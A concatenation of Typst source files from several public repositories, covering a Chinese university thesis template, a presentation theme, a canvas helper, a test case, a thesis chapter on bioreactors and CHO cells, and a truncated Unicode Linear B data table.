let year = {set align(center);year}
let month = {set align(center);month}
let day = {set align(center);day}
set page(paper: "a4", margin: (x: 2.3cm, top: 2cm, bottom: 2cm))
set align(center)
v(1.7cm)
text(font: 字体.黑体, size: 18pt)[东南大学毕业(设计)论文独创性声明]
v(0.8cm)
set align(left)
set par(first-line-indent: 2em, justify: true, leading: 11.83pt)
set text(font: 字体.宋体, size: 12pt)
[本人声明所呈交的毕业(设计)论文是我个人在导师指导下进行的研究工作及取得的研究成果。尽我所知,除了文中特别加以标注和致谢的地方外,论文中不包含其他人已经发表或撰写过的研究成果,也不包含为获得东南大学或其它教育机构的学位或证书而使用过的材料。与我一同工作的同志对本研究所做的任何贡献均已在论文中作了明确的说明并表示了谢意。]
par()[#v(1em)]
[#h(2em)论文作者签名:#box(width: 8em, stroke: (bottom: 0.5pt), outset: 2pt)#h(1.5em)日期:#box(year,width: 3.5em, stroke: (bottom: 0.5pt), outset: 2pt)年#box(month,width: 2.5em, stroke: (bottom: 0.5pt), outset: 2pt)月#box(day,width: 2.5em, stroke: (bottom: 0.5pt), outset: 2pt)日]
v(3.5cm)
set align(center)
v(1.3cm)
text(font: 字体.黑体, size: 18pt)[东南大学毕业(设计)论文使用授权声明]
v(0.5cm)
set align(left)
set par(first-line-indent: 2em, justify: true, leading: 11.83pt)
set text(font: 字体.宋体, size: 12pt)
[东南大学有权保留本人所送交毕业(设计)论文的复印件和电子文档,可以采用影印、缩印或其他复制手段保存论文。本人电子文档的内容和纸质论文的内容相一致。除在保密期内的保密论文外,允许论文被查阅和借阅,可以公布(包括刊登)论文的全部或部分内容。论文的公布(包括刊登)授权东南大学教务处办理。]
par()[#v(1em)]
[论文作者签名:#box(width: 9.5em, stroke: (bottom: 0.5pt), outset: 2pt)#h(2em)导师签名:#box(width: 11.5em, stroke: (bottom: 0.5pt), outset: 2pt)#h(1.5em)\
#h(2em)日期:#box(year,width: 3.5em, stroke: (bottom: 0.5pt), outset: 2pt)年#box(month,width: 2.5em, stroke: (bottom: 0.5pt), outset: 2pt)月#box(day,width: 2.5em, stroke: (bottom: 0.5pt), outset: 2pt)日#h(4em)日期:#box(year,width: 3.5em, stroke: (bottom: 0.5pt), outset: 2pt)年#box(month,width: 2.5em, stroke: (bottom: 0.5pt), outset: 2pt)月#box(day,width: 2.5em, stroke: (bottom: 0.5pt), outset: 2pt)日]
}
// 中文摘要页
#let zh_abstract_page(abstract, key_words) = {
pagebreak()
set page(
paper: "a4",
margin: (top: 3cm, x: 2.5cm, bottom: 3.8cm),
)
set text(size: 12pt, font: 字体.宋体, lang: "zh", region: "cn")
show heading.where(level: 1): it => {
set align(center)
set text(size: 16pt, font: 字体.黑体, weight: "bold")
it
par()[#text(size: 0.5em)[#h(0.0em)]]
v(0.2em)
}
show: show-cn-fakebold
set heading(numbering: none)
[= 摘#h(2em)要]
set text(size: 12pt)
set par(first-line-indent: 2em, justify: true, leading: 行距)
show par: set block(spacing: 行距)
abstract
v(1em)
set par(first-line-indent: 0em)
"关键词:" + key_words.join(",")
}
// 英文摘要页
#let en_abstract_page(abstract, key_words) = {
pagebreak()
set page(
paper: "a4",
margin: (top: 2.55cm, x: 2.5cm, bottom: 3.8cm),
)
show heading.where(level: 1): it => {
set align(center)
set text(size: 16pt, font: 字体.黑体, weight: "bold")
it
par()[#text(size: 0.5em)[#h(0.0em)]]
v(0.2em)
}
show: show-cn-fakebold
set heading(numbering: none)
[= ABSTRACT]
set text(size: 字号.小四, font: 字体.宋体)
set par(first-line-indent: 2em, justify: true, leading: 行距)
show par: set block(spacing: 行距)
abstract
v(2em)
"KEY WORDS: " + key_words.join(", ")
}
// Table of contents page
#let outline_page() = {
pagebreak()
set page(
paper: "a4",
margin: (top: 2.6cm, x: 2.5cm, bottom: 3.8cm),
)
set text(size: 12pt, font: 字体.宋体, lang: "zh", region: "cn")
set par(leading: 12pt, justify: true)
show heading.where(level: 1): it => {
set align(center)
set text(size: 16pt, font: 字体.黑体, weight: "bold")
it
}
show: show-cn-fakebold
show outline.entry: it => {
link(it.element.location())[
#set text(size: 字号.小四)
#it.body
#box(width: 1fr, repeat[.])
#it.page.at("child")
]
}
heading(level: 1, bookmarked: true, outlined: true)[目#h(2em)录]
v(0.6em)
outline(
title: none,
indent: 2em,
depth: 3,
)
set par(first-line-indent: 2em)
}
// Bibliography page
#let seu_bibliography(bib_file: "reference.bib") = {
set text(size: 字号.五号, font: 字体.宋体, lang: "en")
set par(justify: true)
bibliography(bib_file, style: "gb-t-7714-2015-numeric-seu-bachelor.csl", title: [参考文献])
}
#let appendix(doc) = {
counter(heading).update(0)
part_state.update("appendix")
set heading(numbering: (..nums) => {
let nums_array = nums.pos()
if nums_array.len() == 1 {
"附录" + numbering("A", nums_array.first()) + " "
} else {
numbering("A.1", ..nums)
}
})
doc
}
// Acknowledgments page
#let acknowledgment(doc) = {
set heading(numbering: none)
[= 致#h(2em)谢]
doc
}
// Thesis translation template
#let translation_conf(
raw_paper_name: none,
translated_paper_name: none,
student_id: none,
name: none,
college: none,
major: none,
supervisor: none,
date: datetime.today().display("[year].[month].[day]"),
abstract: none,
key_words: (),
doc,
) = {
translation_cover(
raw_paper_name: raw_paper_name,
translated_paper_name: translated_paper_name,
student_id: student_id,
name: name,
college: college,
major: major,
supervisor: supervisor,
date: date,
)
// numbering setting must be before update()
set page(numbering: (..idx) => {
text(size: 9pt, numbering("I", idx.pos().first()))
})
counter(page).update(1)
zh_abstract_page(abstract, key_words)
outline_page()
set_doc(doc)
}
// Bachelor thesis template
#let bachelor_conf(
title: none,
student_id: none,
name: none,
college: none,
major: none,
supervisor: none,
duration: none,
sign_date:(none,none,none),
zh_abstract: none,
zh_key_words: (),
en_abstract: none,
en_key_words: (),
continuous_index: false,
doc,
) = {
bachelor_cover(
title: title,
student_id: student_id,
name: name,
college: college,
major: major,
supervisor: supervisor,
duration: duration,
)
claim_page(year:sign_date.at(0),month:sign_date.at(1),day:sign_date.at(2))
// numbering setting must be before update(). Front matter pages are numbered with Roman numerals.
set page(numbering: (..idx) => {
text(size: 9pt, numbering("I", idx.pos().first()))
})
counter(page).update(1)
zh_abstract_page(zh_abstract, zh_key_words)
en_abstract_page(en_abstract, en_key_words)
outline_page()
set_doc(doc, continuous_index: continuous_index)
}
|
|
https://github.com/antonWetzel/Masterarbeit | https://raw.githubusercontent.com/antonWetzel/Masterarbeit/main/verteidigung/theme.typ | typst | #import "@preview/polylux:0.3.1": *
#let footer_state = state("footer")
#let color-light = rgb("a5a5a5")
#let color-important = rgb("ff7900")
#let color-important-2 = rgb("003359")
#let color-contrast = rgb("007479")
#let distibution = (6fr, 14fr, 3fr)
#let distibution_no_title = (20fr, 3fr)
#let setup(footer: none, doc) = {
set page(width: 25.40cm, height: 14.29cm, margin: 0pt)
set text(lang: "de", font: "Noto Sans", region: "DE", size: 18pt, weight: 400, fallback: false)
show math.equation: set text(font: "Noto Sans Math", weight: 600, fallback: false)
set list(indent: 0.25cm)
show raw: set text(size: 1.2em)
footer_state.update(footer)
doc
}
#let slide-title(title) = locate(loc => {
stack(
dir: ttb,
text(size: 32pt, fill: color-important, strong(utils.current-section)),
v(1em),
text(size: 24pt, fill: color-important-2, strong(title)),
)
})
#let slide-footer() = locate(loc => {
set text(fill: gray, size: 10pt)
let columns = (1cm, auto, 1cm, auto, 1fr, 6cm, 1cm)
grid(
rows: (auto, 1fr),
columns: columns,
align: horizon,
gutter: 0pt,
grid.cell(colspan: columns.len(), {
let ratio = (logic.logical-slide.at(loc).first() - 0.5) / logic.logical-slide.at(locate( <final-slide-marker>)).first() * 100%
if ratio >= 100% {
line(length: 100%, stroke: 3pt + color-contrast)
} else {
set align(horizon)
stack(
dir: ltr,
line(length: ratio - 0.075cm, stroke: 3pt + color-contrast),
circle(radius: 0.15cm, stroke: color-contrast),
line(length: 100% - ratio - 0.075cm, stroke: 1pt + color-contrast),
)
}
}),
[],
logic.logical-slide.display(),
[],
footer_state.at(loc),
[],
image("assets/logo.png"),
[],
)
})
#let title-slide(title: none, subtitle: none) = {
logic.polylux-slide(grid(
rows: distibution,
pad(left: 1cm, top: 1cm, bottom: 1cm, {
text(size: 32pt, fill: color-important, strong(title))
linebreak()
text(size: 24pt, fill: color-important-2, strong(subtitle))
}),
image("assets/first.jpg"),
slide-footer(),
))
}
#let normal-slide(
title: none,
columns: auto,
expand-content: false,
outline-content: none,
..content,
) = {
let positional = content.pos()
let columns = if columns == auto {
(1fr,) * positional.len()
} else if columns.len() == positional.len() {
columns
} else {
panic("mismatch between columns and arguments")
}
let body = table(
columns: columns,
stroke: none,
..content
)
let title = slide-title(title)
let title = if expand-content {
title
} else {
grid.cell(colspan: columns.len(), title)
}
let positional = if expand-content {
let positional = positional.enumerate().map((arg) => if arg.at(0) == 0 {
arg.at(1)
} else {
grid.cell(rowspan: 2, arg.at(1))
})
positional.push(positional.remove(0))
positional
} else {
positional
}
let top = pad(1cm, bottom: 0.5cm, grid(
rows: distibution.slice(0, 2),
column-gutter: 0.5cm,
stroke: outline-content,
columns: columns,
title,
..positional,
))
logic.polylux-slide({
grid(
rows: (distibution.at(0) + distibution.at(1), distibution.at(2)),
top,
slide-footer(),
)
})
}
#let new-section(section) = {
utils.register-section(section)
}
#let final-slide(
title: none,
e-mail: none,
website: none,
) = {
let suffix = if website == none { none } else { [ | ] + website }
logic.polylux-slide(grid(
rows: distibution,
pad(1cm, bottom: 0cm, stack(
dir: ttb,
text(size: 32pt, fill: color-important, strong(title)),
v(0.5cm),
text(size: 14pt, fill: color-important-2, e-mail + suffix),
v(0.3cm),
text(
size: 6pt,
fill: gray,
[Bildnachweis: Folie 1: <NAME>, Folie #logic.logical-slide.display(): helibild],
),
)),
[#image("assets/final.jpg") <final-slide-marker>],
slide-footer(),
))
}
#let focus-slide(size: 100pt, content) = {
utils.register-section(content)
set align(center + horizon)
logic.polylux-slide({
grid(
rows: distibution_no_title,
text(size: size, fill: color-contrast, strong(content)),
slide-footer(),
)
})
}
#let number = (number, unit: none) => {
let number = str(float(number))
let split = number.split(".")
let res = []
{
let text = split.at(0)
for i in range(text.len()) {
res += text.at(i)
let idx = text.len() - i - 1
if idx != 0 and calc.rem(idx, 3) == 0 {
res += sym.space.thin
}
}
}
if split.len() >= 2 {
res += $,$
let text = split.at(1)
for i in range(text.len()) {
res += text.at(i)
if i != 0 and calc.rem(i, 3) == 0 {
res += sym.space.thin
}
}
}
if unit != none {
res += [ ] + unit
}
return box(res)
}
|
|
https://github.com/loqusion/typix | https://raw.githubusercontent.com/loqusion/typix/main/docs/api/derivations/common/src.md | markdown | MIT License | <!-- markdownlint-disable-file first-line-h1 -->
[Source](../../recipes/specifying-sources.md) containing all local files
needed in your Typst project.
|
https://github.com/jamesrswift/pixel-pipeline | https://raw.githubusercontent.com/jamesrswift/pixel-pipeline/main/src/pipeline/canvas/process.typ | typst | The Unlicense | #import "/src/math/lib.typ": *
#let individual(element, anchors: (:)) = {
let bounds = none
let element = element // mutable
if "drawables" in element {
if type(element.drawables) == dictionary {
element.drawables = (element.drawables,)
}
for drawable in element.drawables {
bounds = aabb.from-vectors(
if drawable.type == "path" {
path-util.bounds(drawable.segments)
} else if drawable.type == "content" {
let (x, y, _, w, h,) = drawable.pos + (drawable.width, drawable.height)
((x + w / 2, y - h / 2, 0), (x - w / 2, y + h / 2, 0))
},
initial: bounds
)
}
}
return (
bounds: bounds,
drawables: element.at("drawables", default: ()),
)
}
#let many(body, anchors: (:)) = {
let drawables = ()
let anchors = anchors // mutable
let bounds = none
for element in body {
if type(element) == array {
(bounds, drawables, anchors) = many(element, anchors)
} else {
let processed = individual(element)
if processed != none {
if processed.bounds != none {
bounds = aabb.from-vectors(processed.bounds, initial: bounds)
}
drawables += processed.drawables
}
}
}
return (
bounds: bounds,
drawables: drawables,
anchors: anchors
)
} |
https://github.com/darioglasl/Arbeiten-Vorlage-Typst | https://raw.githubusercontent.com/darioglasl/Arbeiten-Vorlage-Typst/main/01_Einleitung/04_technologies.typ | typst | == Verwendete Technologien <headingUsedTechnologies>
|
|
https://github.com/Tiggax/zakljucna_naloga | https://raw.githubusercontent.com/Tiggax/zakljucna_naloga/main/src/sec/uvod/2.%20bioreactors.typ | typst | #set heading(offset: 1)
#import "../../additional.typ": todo
#import "/src/figures/mod.typ": reactor, batch_reactor
A bioreactor is typically described as an apparatus containing a chamber in which organisms such as bacteria or yeast are grown.
Its purpose is the production of biomolecular metabolites or biopolymers, or the conversion of organic wastes @mandenius_2016[p. 8].
Even if the first impression a bioreactor gives is of something mundane, bioreactors represent vital components in biotechnological processes, particularly in modern pharmaceutical production.
They are instruments or systems engineered to provide an optimal environment wherein biological reactions can take place, facilitating the growth of cells, tissues, or microbial cultures.
They are used in production of food, chemicals and drugs.
Bioreactors have been in use since ancient times.
Ancient cultures solved bioengineering design challenges for practical purposes such as wine and beer making from mere experience and observation.
This paved the way for the advancements of biotechnological processes, mainly for the preparation, production and preservation of food products @soetaert_2010.
By the early twentieth century, large-scale fermentation processes were being utilized, with an impact on the war-time industry of that period.
Glycerol was produced for use in the manufacture of explosives,
achieved by using yeast to convert glucose @mandenius_2016[p. 2].
Butanol and acetone experienced large-scale production utilizing the butyric acid bacteria developed by biochemist <NAME>.
These were first used for the production of explosives, and later for the rubber manufacturing needs of the emerging car industry @santangelo_1996.
The basic parameters for biotechnological processes, like temperature, pH value, dissolved oxygen, etc., are measured and controlled by standard devices implemented in every commercial stirred tank @Kretzmer_2002[p. 138]. These provide information about the values in the bioreactor at each measurement.
In a bioreactor these measurements are divided into three groups:
- _physical_ such as temperature, pressure, flow, etc.
- _chemical_ such as pH or concentrations of $O_2$ or $C O_2$
- _biological_ such as biomass, enzyme activity, consumption of substrate and so on.
All of these measurements can be divided into one of two groups based on how the measurement is taken.
_Online_ measurements are taken directly on the bioreactor and can be monitored in real time, while _offline_ measurements need to be made on a sample drawn from the bioreactor.
== Types
Bioreactors can be classified into many different types.
They differ in their operation, process time, use and functionality.
Among them, suspension bioreactors are by far the most used.
They are easier to operate and can scale much larger.
Their importance can be demonstrated by the annual sales volume of over 250 billion dollars @Meyer_Schmidhalter_2014.
Bioreactors are divided into three groups by their scale.
The smallest among the three are the _laboratory_ bioreactors.
These range up to 5 L, and are mainly used for revitalization and cell growth.
_Pilot_ bioreactors range up to 200 L in size, and can be meant either for inoculum growth or, as semi-industrial reactors, for process optimization or reactor testing.
Lastly, the largest bioreactors are _industrial_, with their size ranging up to 100 000 L.
As the name suggests, they are meant for industrial production.
During the biotechnological process, stirring of the bioreactor is of vital importance.
Stirring ensures that nutrients, cells, substrate and other substances are uniformly distributed throughout the bioreactor.
This can be achieved by using a mechanical mixer, aeration of the bioreactor, using a circulation pump or a combination of these.
For mechanical stirring, various types of impellers are available @Kretzmer_2002[p. 138].
Aeration of the bioreactor is also important for maintaining the oxygen level needed for many aerobic organisms, eucaryotic cells among them, to survive.
This process also helps with stripping waste gases such as $C O_2$, which can saturate the medium and potentially kill the organisms.
On the basis of mode of operation, a bioreactor may be classified as batch, fed-batch or continuous (e.g. a continuous stirred-tank reactor model).
=== Batch
The most basic and oldest of the bioreactor types is the batch bioreactor.
Batch bioreactors derive their name from the way the product is made in batches.
The bioreactor is prepared with a substrate, and then the process starts with the inoculation of the organism.
The process is then monitored until the desired product concentration is achieved.
It is then harvested, and the process can be restarted with a new batch.
A simple sketch of a batch bioreactor can be seen in @batch.
#figure(
caption: [A simple model of a batch bioreactor],
reactor
)<batch>
The most typical example of a batch bioreactor process is beer brewing, one of the oldest biotechnological processes.
In biopharmaceuticals, these bioreactors can be used for the small-scale production of antibodies for research and diagnostic applications @Kretzmer_2002[p. 138].
The problem with batch bioreactors is that their nutrients deplete during the run, which not only results in a drop of viability and death of cells, but also contributes to a steady increase of toxic metabolites.
Ultimately, batch reactors end in intoxication of the process, since toxic metabolites are not removed @Kretzmer_2002[p. 139].
=== Fed-batch
Fed-batch bioreactors differ in that they are "fed" during the process.
The reactor receives a steady supply of substrate throughout the process, as can be seen in @fed-batch.
This can prevent the culture from crashing from a lack of nutrients, and helps to encourage the production of primary metabolites.
This can be seen in an extension of the stationary phase of cell growth and a delay of the death phase of the cells.
By maintaining low concentration set points of major carbon substrates, more efficient primary metabolite production can be achieved, with lower rates of metabolic by-products. This results in the cells remaining in a productive state over an extended time, which has enabled considerable enhancement of yields from these processes @Butler_2005[p. 285].
#figure(
caption: [A simple model of a fed-batch bioreactor],
batch_reactor
)<fed-batch>
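The contrast described above, nutrient depletion in a closed batch run versus a steady feed that keeps the culture supplied, can be sketched numerically. The toy simulation below uses plain Monod growth kinetics integrated with the Euler method; all parameter values are invented for illustration and are not taken from the cited sources.

```python
# Toy comparison of batch vs fed-batch operation (all parameters hypothetical).

MU_MAX = 0.04   # 1/h, maximum specific growth rate (hypothetical)
K_S = 0.5       # g/L, Monod half-saturation constant (hypothetical)
Y_XS = 0.5      # g biomass per g substrate, yield coefficient (hypothetical)

def simulate(feed_rate, hours=200, dt=0.1):
    """Return final (biomass, substrate) in g/L after `hours` of culture.

    `feed_rate` is substrate added per hour (g/L/h); 0 means batch mode.
    """
    x, s = 0.1, 5.0  # initial biomass and substrate, g/L (hypothetical)
    for _ in range(int(hours / dt)):
        mu = MU_MAX * s / (K_S + s)       # Monod specific growth rate
        dx = mu * x * dt                  # biomass growth this step
        ds = -dx / Y_XS + feed_rate * dt  # substrate consumption plus feeding
        x += dx
        s = max(s + ds, 0.0)              # substrate cannot go negative
    return x, s

x_batch, s_batch = simulate(feed_rate=0.0)
x_fed, s_fed = simulate(feed_rate=0.05)
print(f"batch:     biomass {x_batch:.2f} g/L, substrate {s_batch:.2f} g/L")
print(f"fed-batch: biomass {x_fed:.2f} g/L, substrate {s_fed:.2f} g/L")
```

In this sketch the batch run exhausts its substrate and growth stops, while the fed run keeps accumulating biomass, mirroring the extended productive phase described above.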
== Bioreactors using CHO Cells
The first recorded growth of eucaryotic cells happened in 1907.
This was achieved by <NAME> by managing to grow nerve cells utilizing the hanging drop method.
The cells were grown over a period of 30 days, which showed the possibility of growing cells in vitro.
This is why many regard the year 1907 as the beginning of cell cultivation
@Kretzmer_2002[p. 135].
The biggest leap forward towards large-scale cultivation of animal cells was achieved by Earle and Eagle.
They made extensive analyses of the requirements of cells grown in vitro.
By 1955, a chemically defined medium known as @EMEM, short for Eagle's minimum essential medium, was reported by Eagle.
This medium could replace biological fluids such as bovine serum that were used until then.
The only remaining necessity was the addition of undefined blood serum @Kretzmer_2002[p. 135].
Bovine serum was used as a supplement of cell culture media for several decades.
It contains many substances needed for cell growth, such as hormones, growth factors and trace elements.
It also contains high amounts of albumin, which protects cells from stresses like pH fluctuations or shear forces.
The variable and undefined composition of bovine serum made it hard to maintain stable and consistent cell growth and productivity.
This, combined with the mad cow crisis in the beef industry, created a strong demand for cell culture media free of all animal components
@Butler_2005[p. 286].
The revolution started by recombinant @DNA technology and genetic engineering stirred the field of industrial biotechnology with macromolecular products acquired from cells.
At first, bacteria and yeast were used as producers, but animal and human cells soon followed @butler_2012.
By the early 1980s, recombinant proteins started to be introduced to the pharmaceutical industry @Kretzmer_2002[p. 136].
@CHO cell lines are among the most extensively utilized hosts for the production of therapeutic proteins in the bio-pharmaceutic industry @Wurm_2004.
Nearly 80% of the approved human therapeutic antibodies are produced by @CHO cells @Xu_Lin_Mi_Pang_Wang_2023.
They provide an advantage over non-eucaryotic cell lines, since they are able to achieve the correct glycosylation patterns of mammalian cells, needed for protein therapeutics such as therapeutic antibodies @Cui_2023[p. 1].
Their use in stirred tank bioreactors is preferred because of the scalability achievable with these cells @Kretzmer_2002[p. 138].
Currently, stirred tank bioreactors over 10,000 L in scale are readily used for serum-free (SF) suspension cultures of recombinant CHO (@rCHO) cells producing therapeutic antibodies @Kim_2012[p. 917-918].
=== Chinese hamster (_Cricetulus griseus_)
Chinese hamster or Chinese striped hamsters are rodents of the _Cricetidae_ family.
They are native to deserts of China and Mongolia.
Typically, they are brown with a black stripe running down their back.
Their belly is of a lighter color.
The tail is longer than that of typical hamster species.
Coloration in combination with their physique makes them look more mouse-like.
Genus _Cricetulus_ contains species that tend to be more ratlike in appearance than the typical hamster.
They reach maturity at two months, and their gestation period is only three weeks @lsf_2015[p. 39].
Their lifespan is two to three years.
The size ranges from 76 mm to 127 mm, with the tail being 20 mm to 33 mm.
They weigh between 30 and 45 grams.
They are closely related to the Chinese striped hamster (_Cricetulus barabensis_) and are taxonomically unsettled. Some authorities consider them a separate species, while others classify them as a subspecies.
In that case the Latin name of the Chinese hamster becomes _Cricetulus barabensis griseus_, and the Chinese striped hamster becomes _Cricetulus barabensis barabensis_.
=== History of the Chinese hamster in research
Chinese hamsters were first successfully used as laboratory specimens in the early 20th century in place of mice.
The first such report was published by Hsieh in 1919: "A new laboratory animal (Cricetulus griseus)".
He encountered them in the streets of Peking, where the captured hamsters were being sold as pets.
As mice were scarce at the time, he opted to use them in his study for the identification of pneumococcal types by Avery's method @Yerganian_1972[p. 8].
Their fast maturity and short gestation period made them a promising animal model for studying several generations over a single year @lsf_2015[p. 39].
By the mid 20th century, the captured Chinese hamsters were used routinely, both locally and in other countries.
Peking Union Medical College maintained an inexhaustible supply of captured animals.
The number of hamsters employed annually was in the thousands.
Chinese hamsters were being used in a variety of studies pertaining to Leishmaniasis, tuberculosis, diphtheria, rabies, equine encephalitis, influenza, pneumonia, Monilia, relapsing fever and other drug evaluations.
Strong consideration as a possible reservoir host for _Leishmania donovani_ garnered the Chinese hamster world-wide attention.
This parasite is the etiological agent of kala-azar, a disease also known as black fever, and is prevalent in tropical and temperate regions like China, the Middle East, South America and the Mediterranean basin @van_2012[p.310].
The rising popularity of the Chinese hamster led to attempts to breed them in captivity, but they all failed due to their pugnacious habits exhibited whenever adult animals were paired.
Since the Chinese hamster proved to be a most sensitive host for the various forms of _Leishmaniae_, researchers in other countries, notably India and the Near East, were encouraged to import them from China for their own needs @Yerganian_1972[p. 9].
In China, researchers Chang and Wu also noted irregularities in the estrous cycle of captured females, and were able to obtain 5 small litters from laboratory-born females over a 2-year period of trials @Chang1938.
After a report describing the hamster karyotype as consisting of 7 pairs of chromosomes was published, interest in the Chinese hamster was renewed @Pontecorvo_1944.
Low chromosome count in comparison to other animals (mice have 2n = 40 and rats have 2n = 42) made them promising animals for cytogenetic research @Jayapal_2007[p. 41].
In 1948, 20 subjects (ten female and ten male) were smuggled out of China into the U.S. by Dr. <NAME>.
The hamsters were supplied by Dr. <NAME>, a pathologist at Peking Union Medical College for Dr. Schwentker to try to start a colony @Yerganian_1972[p. 12-13].
The hamsters left China on one of the last Pan-Am flights out of Shanghai before the Chinese civil war ended with the Maoists' victory and the establishment of the new People's Republic.
Dr. Hu and Dr. Watson were both charged by the Chinese Germ Warfare Commission.
Dr. Watson was accused of "war crimes" and tried in absentia, while Dr. Hu was
found guilty of supplying scientific material to the enemy.
He was convicted and sent to a detention camp for six months
@Yerganian_1972[p. 15].
Upon successful landing of the hamsters in San Francisco, they were shipped to Schwentker's farm.
Schwentker managed to domesticate and breed them in captivity. The process required a great amount of labor-intensive taming, but within two years he had managed to create a thriving colony.
By 1954, Schwentker had discontinued sales of Chinese hamsters.
They were popular with researchers, but their naturally solitary habits combined with female aggression in captivity made raising and breeding them a difficult and laborious job.
Schwentker never published or shared his breeding techniques, but by 1954, <NAME>, a graduate student at Harvard, had devised his own hamster-taming methods.
With funds from the National Cancer Institute, he established a breeding center and began distributing hamsters to scientific colleagues.
He became the sole supplier of Chinese hamsters to biomedical research institutions in the United States for the next decade @lsf_2015.
=== CHO cell lines
The developments of the 1970s – fusion of cells to form hybridomas, and genetic engineering – triggered a second wave of products. Monoclonal antibodies and recombinant proteins for diagnosis and therapy set new challenges for the inventors @Kretzmer_2002[p. 135].
Today, there has been a rapid increase in the number of, and demand for, approved bio-pharmaceuticals produced from animal cell culture processes.
Part of it has been due to the efficiency of several humanized monoclonal antibodies that are required at large doses for therapeutic use @Butler_2005[p. 283].
The popularity of @CHO cells can be attributed to several reasons.
Firstly, as @CHO cells have been demonstrated to be safe hosts, it is easier to obtain approval to market the therapeutic proteins from regulatory agencies like the @FDA.
Secondly, low specific productivity, normally the disadvantage of using mammalian cells for protein production, can be overcome by gene amplification in @CHO cells.
Powerful gene amplification systems, like dihydrofolate reductase (DHFR)-mediated or glutamine synthetase (GS)-mediated gene amplification, are available for @CHO cells.
Thirdly, @CHO cells have the capacity for efficient post-translational modification, and also produce recombinant proteins with glycoforms that are both compatible with and fully functional within humans.
Finally, @CHO cells can adapt easily to growth in the regulatory-friendly serum-free suspension conditions.
This characteristic is preferred for large-scale culture in bioreactors @Kim_2012[p. 917-918].
Recent advances in cell culture technology for @rCHO cells have achieved significant improvement in protein production, leading to titers of more than 10 g/L to meet the huge demand from market needs @Kim_2012[p. 917].
As such, @CHO cells have become the standard mammalian host cells used in the production of recombinant proteins, although there are other options such as the mouse myeloma (NS0), baby hamster kidney (@BHK), human embryonic kidney (@HEK[293]) or human-retina-derived (PER C6) cells.
All these cell lines have been adapted to grow in suspension culture and are well suited for scale-up in stirred tank bioreactors @Butler_2005[p. 284].
|
|
https://github.com/Myriad-Dreamin/typst.ts | https://raw.githubusercontent.com/Myriad-Dreamin/typst.ts/main/fuzzers/corpora/layout/enum-numbering_00.typ | typst | Apache License 2.0 |
#import "/contrib/templates/std-tests/preset.typ": *
#show: test-page
// Test numbering pattern.
#set enum(numbering: "(1.a.*)")
+ First
+ Second
2. Nested
+ Deep
+ Normal
|
https://github.com/typst/packages | https://raw.githubusercontent.com/typst/packages/main/packages/preview/unichar/0.1.0/ucd/block-10000.typ | typst | Apache License 2.0 | #let data = (
("LINEAR B SYLLABLE B008 A", "Lo", 0),
("LINEAR B SYLLABLE B038 E", "Lo", 0),
("LINEAR B SYLLABLE B028 I", "Lo", 0),
("LINEAR B SYLLABLE B061 O", "Lo", 0),
("LINEAR B SYLLABLE B010 U", "Lo", 0),
("LINEAR B SYLLABLE B001 DA", "Lo", 0),
("LINEAR B SYLLABLE B045 DE", "Lo", 0),
("LINEAR B SYLLABLE B007 DI", "Lo", 0),
("LINEAR B SYLLABLE B014 DO", "Lo", 0),
("LINEAR B SYLLABLE B051 DU", "Lo", 0),
("LINEAR B SYLLABLE B057 JA", "Lo", 0),
("LINEAR B SYLLABLE B046 JE", "Lo", 0),
(),
("LINEAR B SYLLABLE B036 JO", "Lo", 0),
("LINEAR B SYLLABLE B065 JU", "Lo", 0),
("LINEAR B SYLLABLE B077 KA", "Lo", 0),
("LINEAR B SYLLABLE B044 KE", "Lo", 0),
("LINEAR B SYLLABLE B067 KI", "Lo", 0),
("LINEAR B SYLLABLE B070 KO", "Lo", 0),
("LINEAR B SYLLABLE B081 KU", "Lo", 0),
("LINEAR B SYLLABLE B080 MA", "Lo", 0),
("LINEAR B SYLLABLE B013 ME", "Lo", 0),
("LINEAR B SYLLABLE B073 MI", "Lo", 0),
("LINEAR B SYLLABLE B015 MO", "Lo", 0),
("LINEAR B SYLLABLE B023 MU", "Lo", 0),
("LINEAR B SYLLABLE B006 NA", "Lo", 0),
("LINEAR B SYLLABLE B024 NE", "Lo", 0),
("LINEAR B SYLLABLE B030 NI", "Lo", 0),
("LINEAR B SYLLABLE B052 NO", "Lo", 0),
("LINEAR B SYLLABLE B055 NU", "Lo", 0),
("LINEAR B SYLLABLE B003 PA", "Lo", 0),
("LINEAR B SYLLABLE B072 PE", "Lo", 0),
("LINEAR B SYLLABLE B039 PI", "Lo", 0),
("LINEAR B SYLLABLE B011 PO", "Lo", 0),
("LINEAR B SYLLABLE B050 PU", "Lo", 0),
("LINEAR B SYLLABLE B016 QA", "Lo", 0),
("LINEAR B SYLLABLE B078 QE", "Lo", 0),
("LINEAR B SYLLABLE B021 QI", "Lo", 0),
("LINEAR B SYLLABLE B032 QO", "Lo", 0),
(),
("LINEAR B SYLLABLE B060 RA", "Lo", 0),
("LINEAR B SYLLABLE B027 RE", "Lo", 0),
("LINEAR B SYLLABLE B053 RI", "Lo", 0),
("LINEAR B SYLLABLE B002 RO", "Lo", 0),
("LINEAR B SYLLABLE B026 RU", "Lo", 0),
("LINEAR B SYLLABLE B031 SA", "Lo", 0),
("LINEAR B SYLLABLE B009 SE", "Lo", 0),
("LINEAR B SYLLABLE B041 SI", "Lo", 0),
("LINEAR B SYLLABLE B012 SO", "Lo", 0),
("LINEAR B SYLLABLE B058 SU", "Lo", 0),
("LINEAR B SYLLABLE B059 TA", "Lo", 0),
("LINEAR B SYLLABLE B004 TE", "Lo", 0),
("LINEAR B SYLLABLE B037 TI", "Lo", 0),
("LINEAR B SYLLABLE B005 TO", "Lo", 0),
("LINEAR B SYLLABLE B069 TU", "Lo", 0),
("LINEAR B SYLLABLE B054 WA", "Lo", 0),
("LINEAR B SYLLABLE B075 WE", "Lo", 0),
("LINEAR B SYLLABLE B040 WI", "Lo", 0),
("LINEAR B SYLLABLE B042 WO", "Lo", 0),
(),
("LINEAR B SYLLABLE B017 ZA", "Lo", 0),
("LINEAR B SYLLABLE B074 ZE", "Lo", 0),
(),
("LINEAR B SYLLABLE B020 ZO", "Lo", 0),
("LINEAR B SYLLABLE B025 A2", "Lo", 0),
("LINEAR B SYLLABLE B043 A3", "Lo", 0),
("LINEAR B SYLLABLE B085 AU", "Lo", 0),
("LINEAR B SYLLABLE B071 DWE", "Lo", 0),
("LINEAR B SYLLABLE B090 DWO", "Lo", 0),
("LINEAR B SYLLABLE B048 NWA", "Lo", 0),
("LINEAR B SYLLABLE B029 PU2", "Lo", 0),
("LINEAR B SYLLABLE B062 PTE", "Lo", 0),
("LINEAR B SYLLABLE B076 RA2", "Lo", 0),
("LINEAR B SYLLABLE B033 RA3", "Lo", 0),
